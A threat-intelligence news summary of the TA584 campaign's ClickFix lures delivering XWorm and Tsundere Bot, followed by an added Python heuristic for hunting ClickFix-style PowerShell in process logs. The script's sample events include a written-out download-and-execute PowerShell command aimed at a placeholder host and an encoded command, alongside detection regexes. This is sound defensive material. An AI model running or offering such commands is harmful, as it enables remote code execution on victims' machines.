TA584 threat actor leverages Tsundere Bot and XWorm for network access

A prolific initial access broker, identified as TA584, has been observed employing the Tsundere Bot in conjunction with the XWorm remote access trojan. This combination facilitates network access, potentially paving the way for ransomware attacks.

Proofpoint researchers have been monitoring TA584’s activities since 2020 and have noted a significant escalation in its operations, introducing a sophisticated attack chain designed to bypass traditional security measures, with further coverage provided by Bleeping Computer.

TA584’s current attack chain begins with emails sent from compromised accounts via SendGrid and Amazon SES. These emails contain unique URLs, geofencing, and IP filtering, often utilizing redirect chains through traffic direction systems like Keitaro. Victims who bypass these initial filters encounter a CAPTCHA, followed by a ClickFix page instructing them to execute a PowerShell command. This command loads either XWorm or Tsundere Bot into memory. Tsundere Bot, a malware-as-a-service platform, gathers system information, can execute arbitrary code, and uses the Ethereum blockchain to retrieve its command-and-control address. TA584 has a history of using various payloads, including Ursnif and Cobalt Strike.

The increased volume and expanded geographic targeting by TA584, including new European countries and Australia, highlight a growing threat. The use of Tsundere Bot and XWorm, coupled with advanced evasion techniques, suggests a persistent effort to gain initial access for further malicious activities, likely including ransomware deployment.

Source: Bleeping Computer
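The ClickFix stage described above ends with the victim pasting a PowerShell command that loads the payload into memory, which is a step defenders can hunt for in process-creation telemetry. The following is an added illustration, not code from Proofpoint, Bleeping Computer or the article: it runs a simple heuristic over constructed Sysmon-style process-creation records and flags PowerShell that was launched from the user's shell (explorer.exe, as happens when a command is pasted into the Run dialog) together with generic in-memory-loading indicators. The log records, the field layout and the indicator patterns are all assumptions; the article does not reproduce TA584's actual command, so this is a hunting heuristic rather than a signature.

```python
"""
Hunting heuristic for ClickFix-style PowerShell execution.

Added example, not the article's or Proofpoint's code and not a TA584
signature.  Event records are constructed; the indicator patterns are
generic "download and run in memory" tells and are an assumption.
"""
import re
from dataclasses import dataclass

# Constructed sample records in a Sysmon-style "key=value|key=value" form.
SAMPLE_EVENTS = [
    # 1: user-launched PowerShell pulling and running a remote script (should flag)
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -w hidden -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\"",
    # 2: user-launched PowerShell running a local script (benign admin use)
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -NoProfile -File C:\\Scripts\\backup.ps1",
    # 3: service-launched PowerShell (management tooling)
    "ParentImage=C:\\Windows\\System32\\svchost.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -ExecutionPolicy Bypass -File C:\\ProgramData\\mgmt\\inventory.ps1",
    # 4: not PowerShell at all
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd /c dir",
    # 5: user-launched PowerShell with an encoded command (should flag)
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
]

USER_SHELLS = {"explorer.exe"}          # interactive launch: Run dialog, Win+R
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Assumed indicators of download-and-execute-in-memory behaviour.
INMEM_PATTERNS = [
    re.compile(r"\biex\b|invoke-expression", re.I),
    re.compile(r"downloadstring|invoke-webrequest|\biwr\b|\birm\b|invoke-restmethod", re.I),
    re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.I),
    re.compile(r"(^|\s)-w(indowstyle)?\s+hidden\b", re.I),
]


@dataclass
class Finding:
    line_no: int
    reasons: list


def parse_event(line):
    """Split a 'key=value|key=value' record into a dict."""
    return dict(kv.split("=", 1) for kv in line.split("|"))


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the list of reasons this event looks like ClickFix execution."""
    reasons = []
    if basename(ev.get("Image", "")) not in POWERSHELL_IMAGES:
        return reasons
    if basename(ev.get("ParentImage", "")) in USER_SHELLS:
        reasons.append("powershell launched from user shell")
    cmd = ev.get("CommandLine", "")
    for pat in INMEM_PATTERNS:
        if pat.search(cmd):
            reasons.append(f"indicator:{pat.pattern}")
    return reasons


def hunt(lines, min_reasons=2):
    """Flag events that accumulate at least min_reasons independent tells."""
    findings = []
    for i, line in enumerate(lines, 1):
        reasons = score_event(parse_event(line))
        if len(reasons) >= min_reasons:
            findings.append(Finding(i, reasons))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"event {f.line_no}: " + "; ".join(f.reasons))
```

Requiring two independent tells (user-shell parent plus a command-line indicator) keeps ordinary admin use of PowerShell, such as records 2 and 3, out of the result set, while records 1 and 5 are flagged. In a real deployment the same logic would run over Sysmon Event ID 1 or Windows 4688 data with command-line logging enabled, and a hit would be a trigger for triage of the surrounding email and web activity rather than a verdict on its own.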
